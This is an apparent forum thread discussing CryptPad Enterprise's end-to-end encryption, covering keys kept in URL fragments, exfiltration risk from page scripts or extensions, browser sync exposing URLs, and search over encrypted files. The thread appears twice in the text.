Most online collaboration tools ask you to trust them with your data. Google Docs and Microsoft 365 store your files on their servers, scan your content, and build profiles on users. CryptPad does the opposite. It’s a real-time document editor where everything is encrypted—only you and your team can see what you write. Not even the server can read your files.
Now, we’re bringing that same privacy-first approach to businesses with CryptPad Enterprise. It’s a self-hosted, end-to-end encrypted alternative to Big Tech’s office suites, designed for teams that care about privacy, security, and data sovereignty. With governments and companies across Europe looking for ways to move away from US-based cloud services, solutions like this are becoming more relevant.
We’re hosting a webinar to talk about how it works, the technical challenges of scaling encrypted collaboration, and what’s next. If you’re interested in privacy-first infrastructure, join us:
But isn't the key just in the url? If the key is sent to the servers in any way, it can be used to decrypt and read the files. I'm not sure that this achieves anything more than a pinky promise of "we won't read your files" because when push comes to shove the keys will be logged and turned over to the authorities.
I haven't used the product but if the key is in the fragment segment of the URL then its not sent to the server. This is a pretty common pattern for these e2e encrypted web apps.
> The fragment of a URI is the last part of the URI, starting with the # character. It is used to identify a specific part of the resource, such as a section of a document or a position in a video. The fragment is not sent to the server when the URI is requested, but it is processed by the client (such as the browser) after the resource is retrieved.
On page javascript could just read the locally decrypted content regardless of how the decryption keys are managed, the key being in the URL doesn't change anything.
If you have compromised browser extensions with script injection access, it's game over from a security perspective of any sites you visit.
As a sidenote, that's actually one significant benefit of the "Manifest V3" Web Extension model – it's possible to grant these permissions on a per-site basis. (For example, you can allow uBlock Lite script injection access only on some sites, and limit it to declarative network request blocking otherwise.)
When you go to say Google Docs, you're retrieving JS from _not_ your stuff. That JS (theoretically) can be altered to send back unencrypted data back to Google Docs.
The point they were making is that in this scenario you've self-hosted the JS and so it's not going to be altered to send back unencrypted data because you yourself aren't going to do that alteration.
---
Sure in both scenarios if you have an extension that uploads the content of the page it doesn't matter but there are more threat scenarios that apply to JS served from not your server than from your server.
Above commenter got it exactly right. Yes, if you've installed extensions with malicious code, your data anywhere can be exfiltrated.
That is one of the privacy dangers of cryptpad, and it's not particularly far-fetched. Specifically with shared documents, one needs to trust that every extension every user who visits your document has installed is non-malicious in order to have an assurance that only approved people will see those docs.
Of course this is a browser-based consideration that would affect shared docs on any browser-based platform, but as a privacy-focused app I think it's fair to consider modes of failure inherent in it being a browser-based app. Signal and other Desktop applications, by contrast, wouldn't have these same risks (and Cryptpad could similarly bundle its client as an electron-based app to provide better security).
Oh, I wasn't aware that slashes can follow the #. In that case it seems to be. Thanks for the correction. So the only concern here is injecting js to exfiltrate the key then.
Cryptpad (the non-enterprise version anyway) puts the encryption key for its document links after the fragment ('#') which means that doesn't get sent to the servers.
However, anyone using a browser like Chrome, Safari, or Edge that has cloud syncing will be sending this URL to the respective browser manufacturers, which means you're still handing over the documents to Google (or Apple, or Microsoft)
Safari and Chrome (and Firefox!) cloud syncing are e2e encrypted so you should not be handing over anything to Apple or Google. I haven't looked into Edge/Microsofts solution but I would hope they would e2e encrypt as well.
Edit: Actually just looked and I can't find any information indicating Edge sync is e2e encrypted except for enterprise accounts. So beware of that browser if you weren't already.
Safari does use different types of encryption for open tabs and history vs. bookmarks (the former E2E, the latter depending on whether the account is using ADP), and I believe Firefox is completely E2E (based on the Mozilla password) by default, but I can't find a description of what Chrome does in details.
Specifically, enabling Chrome's end-to-end sync encryption opts the account out of history sync. I can't think of any reasonable explanation for that other than Google wanting to discourage its use.
But unless you're able to ensure that all users of your cryptpad documents have e2ee configured with a strong password, it's likely that Google will see the URLs with decryption keys to your cryptpad docs. It only takes one weak link...
Oh sure, if you're running malicious code in the browser already then Cryptpad can't protect you.
I'm saying that in addition to this, Google, Microsoft, and Apple will be able to read your Cryptpad documents because they'll have the URL with the decryption key. The only thing putting the key in the fragment portion of your URL accomplishes is ensuring that the cryptpad server itself (which you control anyway if you're self-hosting) can't access the data
Because that's a job for the service, not the client.
If the client needs to implement the search index on its own, why even have a service? What benefit does the service bring?
If I need to host the search index myself, that makes a much more vulnerable target for surveillance or attack, compared to a centralized service which has a dedicated security/privacy team. I would need to roll my own security, or trust the vendor. We are back to square one.
Just because that's the easiest solution if you already have the data unencrypted on the server side doesn't mean it's the only one.
> What benefit does the service bring?
It allows synchronization between clients, online collaboration, and serves as an automatic backup. That's basically everything I want from most document cloud services!
Because it provide critical part named "hosting" - because everyone is constantly ad'ded to be too moronic to setup their own. "Send your data to us! And pay us! LOL"
Just wait for some fuck up story or news that data wasn't actually encrypted on provider part - yes, that already happened in some "encryption provider".
Or maybe teach managers for routine darknet checking to find if their data are already there ? :>>
Most online collaboration tools ask you to trust them with your data. Google Docs and Microsoft 365 store your files on their servers, scan your content, and build profiles on users. CryptPad does the opposite. It’s a real-time document editor where everything is encrypted—only you and your team can see what you write. Not even the server can read your files.
Now, we’re bringing that same privacy-first approach to businesses with CryptPad Enterprise. It’s a self-hosted, end-to-end encrypted alternative to Big Tech’s office suites, designed for teams that care about privacy, security, and data sovereignty. With governments and companies across Europe looking for ways to move away from US-based cloud services, solutions like this are becoming more relevant.
We’re hosting a webinar to talk about how it works, the technical challenges of scaling encrypted collaboration, and what’s next. If you’re interested in privacy-first infrastructure, join us:
But isn't the key just in the url? If the key is sent to the servers in any way, it can be used to decrypt and read the files. I'm not sure that this achieves anything more than a pinky promise of "we won't read your files" because when push comes to shove the keys will be logged and turned over to the authorities.
I haven't used the product but if the key is in the fragment segment of the URL then its not sent to the server. This is a pretty common pattern for these e2e encrypted web apps.
> The fragment of a URI is the last part of the URI, starting with the # character. It is used to identify a specific part of the resource, such as a section of a document or a position in a video. The fragment is not sent to the server when the URI is requested, but it is processed by the client (such as the browser) after the resource is retrieved.
https://developer.mozilla.org/en-US/docs/Web/URI/Reference/F...
Couldn't on-page javascript read the fragment and send that to an endpoint?
On page javascript could just read the locally decrypted content regardless of how the decryption keys are managed, the key being in the URL doesn't change anything.
You have to trust the server to not serve a page which will exfiltrate the encrypted data with Javascript (and why wouldn't you if it's self-hosted).
Though I'm not sure exfiltration is actually prevented since extension scripts can still run in the page context.
If you have compromised browser extensions with script injection access, it's game over from a security perspective of any sites you visit.
As a sidenote, that's actually one significant benefit of the "Manifest V3" Web Extension model – it's possible to grant these permissions on a per-site basis. (For example, you can allow uBlock Lite script injection access only on some sites, and limit it to declarative network request blocking otherwise.)
I think you missed the point they were making.
When you go to say Google Docs, you're retrieving JS from _not_ your stuff. That JS (theoretically) can be altered to send back unencrypted data back to Google Docs.
The point they were making is that in this scenario you've self-hosted the JS and so it's not going to be altered to send back unencrypted data because you yourself aren't going to do that alteration.
---
Sure in both scenarios if you have an extension that uploads the content of the page it doesn't matter but there are more threat scenarios that apply to JS served from not your server than from your server.
They mentioned extensions though, and I made a comment on that specific attack vector.
Above commenter got it exactly right. Yes, if you've installed extensions with malicious code, your data anywhere can be exfiltrated.
That is one of the privacy dangers of cryptpad, and it's not particularly far-fetched. Specifically with shared documents, one needs to trust that every extension every user who visits your document has installed is non-malicious in order to have an assurance that only approved people will see those docs.
Of course this is a browser-based consideration that would affect shared docs on any browser-based platform, but as a privacy-focused app I think it's fair to consider modes of failure inherent in it being a browser-based app. Signal and other Desktop applications, by contrast, wouldn't have these same risks (and Cryptpad could similarly bundle its client as an electron-based app to provide better security).
It doesn't seem to be.
Do you have an example? As per their docs, they do put the encryption key after the '#': https://github.com/cryptpad/cryptpad/blob/main/docs/ARCHITEC...
Oh, I wasn't aware that slashes can follow the #. In that case it seems to be. Thanks for the correction. So the only concern here is injecting js to exfiltrate the key then.
Cryptpad (the non-enterprise version anyway) puts the encryption key for its document links after the fragment ('#') which means that doesn't get sent to the servers.
However, anyone using a browser like Chrome, Safari, or Edge that has cloud syncing will be sending this URL to the respective browser manufacturers, which means you're still handing over the documents to Google (or Apple, or Microsoft)
Safari and Chrome (and Firefox!) cloud syncing are e2e encrypted so you should not be handing over anything to Apple or Google. I haven't looked into Edge/Microsofts solution but I would hope they would e2e encrypt as well.
Edit: Actually just looked and I can't find any information indicating Edge sync is e2e encrypted except for enterprise accounts. So beware of that browser if you weren't already.
Is that true by default for Chrome?
Safari does use different types of encryption for open tabs and history vs. bookmarks (the former E2E, the latter depending on whether the account is using ADP), and I believe Firefox is completely E2E (based on the Mozilla password) by default, but I can't find a description of what Chrome does in details.
Specifically, enabling Chrome's end-to-end sync encryption opts the account out of history sync. I can't think of any reasonable explanation for that other than Google wanting to discourage its use.
You can request your Chrome history from Google Takeout; I don't see how this is possible if they don't have access to your browser history.
Edit: it looks like e2ee is an option, though it's not the default, and Google goes out of their way to make this inconvenient for users: https://palant.info/2023/08/29/chrome-sync-privacy-is-still-...
But unless you're able to ensure that all users of your cryptpad documents have e2ee configured with a strong password, it's likely that Google will see the URLs with decryption keys to your cryptpad docs. It only takes one weak link...
It's trivial for the host to inject some JavaScript that reads the fragment and phones home.
The FISA request writes itself.
Oh sure, if you're running malicious code in the browser already then Cryptpad can't protect you.
I'm saying that in addition to this, Google, Microsoft, and Apple will be able to read your Cryptpad documents because they'll have the URL with the decryption key. The only thing putting the key in the fragment portion of your URL accomplishes is ensuring that the cryptpad server itself (which you control anyway if you're self-hosting) can't access the data
How does search work, if the files are unreadable?
What do you do about copyright or CSAM?
Why would E2EE hinder search ? Any clients could build or update the search index.
Because that's a job for the service, not the client.
If the client needs to implement the search index on its own, why even have a service? What benefit does the service bring?
If I need to host the search index myself, that makes a much more vulnerable target for surveillance or attack, compared to a centralized service which has a dedicated security/privacy team. I would need to roll my own security, or trust the vendor. We are back to square one.
Says who?
Just because that's the easiest solution if you already have the data unencrypted on the server side doesn't mean it's the only one.
> What benefit does the service bring?
It allows synchronization between clients, online collaboration, and serves as an automatic backup. That's basically everything I want from most document cloud services!
Because it provide critical part named "hosting" - because everyone is constantly ad'ded to be too moronic to setup their own. "Send your data to us! And pay us! LOL"
Just wait for some fuck up story or news that data wasn't actually encrypted on provider part - yes, that already happened in some "encryption provider".
Or maybe teach managers for routine darknet checking to find if their data are already there ? :>>